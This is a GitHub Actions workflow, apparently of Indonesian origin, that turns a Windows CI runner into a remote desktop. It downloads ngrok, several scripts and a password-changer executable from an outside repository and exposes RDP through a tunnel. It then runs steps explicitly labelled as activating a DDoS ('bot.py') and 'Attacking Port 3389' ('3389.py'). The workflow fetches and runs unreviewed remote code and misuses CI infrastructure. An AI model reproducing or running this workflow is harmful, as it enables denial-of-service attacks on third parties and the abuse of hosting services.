name: bezXRDP

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999990

    steps:
    - name: Mendownload Ngrok.
      run: |
        Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
        Invoke-WebRequest https://raw.githubusercontent.com/SyzuTopia54y/xrdp/main/start.bat -OutFile start.bat
        Invoke-WebRequest https://raw.githubusercontent.com/SyzuTopia54y/xrdp/main/wallpaper.png -OutFile wallpaper.png
        Invoke-WebRequest https://raw.githubusercontent.com/SyzuTopia54y/xrdp/main/wallpaper.bat -OutFile wallpaper.bat
        Invoke-WebRequest https://raw.githubusercontent.com/SyzuTopia54y/xrdp/main/loop.bat -OutFile loop.bat
        Invoke-WebRequest https://github.com/SyzuTopia54y/xrdp/raw/main/bot.py -OutFile bot.py
        Invoke-WebRequest https://github.com/SyzuTopia54y/xrdp/raw/main/3389.py -OutFile 3389.py
    - name: Mendownload Launcher.
      run: |
        Invoke-WebRequest https://github.com/SyzuTopia54y/xrdp/raw/main/launcher/Ganti%20Password.exe -OutFile "Ganti Password.exe"
    - name: Mengextract Ngrok File.
      run: Expand-Archive ngrok.zip
    - name: Connect Ke Akun Ngrok.
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Mengaktifkan Akses RDP.
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
        copy wallpaper.png D:\a\wallpaper.png
        copy wallpaper.bat D:\a\wallpaper.bat
        copy "Ganti Password.exe" "C:\Users\Public\Desktop\Ganti Password.exe"
    - name: Membuat Tunnel.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp --region ap 3389"'
    - name: Mengaktifkan DDOS.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command "python bot.py"'
    - name: Attacking Port 3389.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command "python 3389.py"'
    - name: Connect Ke RDP Kamu CPU 2 Core - 7GB Ram - 256 SSD.
      run: cmd /c start.bat
    - name: Berhasil Dibuat! Anda Bisa Menutup Tab Sekarang.
      run: cmd /c loop.bat
